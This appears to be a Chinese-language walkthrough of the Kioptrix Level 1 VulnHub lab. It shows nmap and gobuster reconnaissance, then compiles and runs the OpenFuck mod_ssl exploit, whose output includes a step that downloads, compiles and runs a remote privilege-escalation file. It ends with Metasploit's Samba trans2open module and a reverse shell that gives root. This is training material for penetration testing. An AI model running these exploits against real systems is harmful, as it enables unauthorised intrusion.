靶场信息

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
这个Kioptrix VM Image是很容易的挑战。游戏的目的是通过任何可能的手段获得root权限(除了实际入侵VM服务器或玩家)。这些游戏的目的是学习漏洞评估和利用方面的基本工具和技术。成功完成这些挑战的方法有很多。
下载地址
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

信息搜集

首先使用arp获取靶机的IP地址

┌──(root💀kali)-[~/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:5d:2e:77, IPv4: 192.168.1.106
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.102   00:0c:29:55:cb:15       VMware, Inc.

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.135 seconds (119.91 hosts/sec). 7 responded

确定靶机IP地址为192.168.1.102,使用nmap进行端口扫描

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 192.168.1.102
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 07:47 EST
Nmap scan report for 192.168.1.102
Host is up (0.00042s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2021-11-12T13:50:26+00:00; +1h01m55s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:55:CB:15 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m54s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.1.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.83 seconds

这东西稍微的有点多,一个个看

80端口好像也没啥可看的?扫个目录看看吧

┌──(root💀kali)-[~/Desktop]
└─# gobuster dir -w /usr/share/dirb/wordlists/common.txt -x .php -e -t 200 -u http://192.168.1.102/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.102/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/11/12 07:52:42 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.102/.htaccess            (Status: 403) [Size: 273]
http://192.168.1.102/.htpasswd            (Status: 403) [Size: 273]
http://192.168.1.102/.hta                 (Status: 403) [Size: 268]
http://192.168.1.102/.htaccess.php        (Status: 403) [Size: 277]
http://192.168.1.102/.htpasswd.php        (Status: 403) [Size: 277]
http://192.168.1.102/.hta.php             (Status: 403) [Size: 272]
http://192.168.1.102/~root                (Status: 403) [Size: 269]
http://192.168.1.102/~operator            (Status: 403) [Size: 273]
http://192.168.1.102/cgi-bin/             (Status: 403) [Size: 272]
http://192.168.1.102/index.html           (Status: 200) [Size: 2890]
http://192.168.1.102/manual               (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
http://192.168.1.102/mrtg                 (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
http://192.168.1.102/usage                (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
http://192.168.1.102/test.php             (Status: 200) [Size: 27]

挨个去看看

几个页面都会跳转到127.0.0.1,只有test.php可以访问,而且还没什么东西

继续回到端口看看吧

┌──(root💀kali)-[~/Desktop]
└─# smbclient -L 192.168.1.102                                                                                                            1 ⨯
protocol negotiation failed: NT_STATUS_IO_TIMEOUT

漏洞利用

看到80端口后面的mod_ssl/2.8.4,去搜一下有没有Exploit

┌──(root💀kali)-[~/Desktop]
└─# searchsploit mod_ssl
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                             | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                  | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                  | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

对比mod_ssl/2.8.4版本,有三个版本合适,挨个进行测试

经过测试发现unix/remote/47080.c是可以使用的,咱们给他复制出来

┌──(root💀kali)-[~/Desktop]
└─# locate unix/remote/47080.c
/usr/share/exploitdb/exploits/unix/remote/47080.c

┌──(root💀kali)-[~/Desktop]
└─# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

然后使用gcc进行编译

┌──(root💀kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
   21 | #include <openssl/ssl.h>
      |          ^~~~~~~~~~~~~~~
compilation terminated.

提示报错了,经过百度搜索,发现是缺少了组件

咱们使用apt进行安装

┌──(root💀kali)-[~/Desktop]
└─# apt-get install libssl1.0-dev

然后再进行编译

┌──(root💀kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto

┌──(root💀kali)-[~/Desktop]
└─# ls
47080.c  exploit

去运行一下

┌──(root💀kali)-[~/Desktop]
└─# ./exploit

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./exploit target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)

运行后得到了运行参数,咱们还得先找到对应的版本

┌──(root💀kali)-[~/Desktop]
└─# ./exploit | grep apache-1.3.20                                                                                                        1 ⨯
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)

符合条件的有两个,分别是0x6a和0x6b,分别去测试一下

┌──(root💀kali)-[~/Desktop]
└─# ./exploit 0x6a 192.168.1.102 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8070
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a测试失败,现在去测试一下0x6b

┌──(root💀kali)-[~/Desktop]
└─# ./exploit 0x6b 192.168.1.102 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--09:32:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$ whoami&&id
whoami&&id
apache
uid=48(apache) gid=48(apache) groups=48(apache)

0x6b成功getshell,现在去提权

权限提升

经过测试后没有发现提权的点,但是发现了另一种root权限的方法,那就是用msf的模块

use exploit/linux/samba/trans2open
set payload linux/x86/shell_reverse_tcp
show options
set rhosts 192.168.1.102
exploit

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444
[*] 192.168.1.102:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.102:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.102:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.102:139 - Trying return address 0xbffffafc...
[*] 192.168.1.102:139 - Trying return address 0xbffff9fc...
[*] 192.168.1.102:139 - Trying return address 0xbffff8fc...
[*] Command shell session 1 opened (192.168.1.106:4444 -> 192.168.1.102:1036) at 2021-11-13 07:04:24 -0500

[*] Command shell session 2 opened (192.168.1.106:4444 -> 192.168.1.102:1037) at 2021-11-13 07:04:25 -0500
[*] Command shell session 3 opened (192.168.1.106:4444 -> 192.168.1.102:1038) at 2021-11-13 07:04:26 -0500
whoami&&id
root
uid=0(root) gid=0(root) groups=99(nobody)

用msf的模块打就是root,至于为啥我也没研究出个所以然来(主要因为菜)

知道原因的小伙伴可以告诉我一下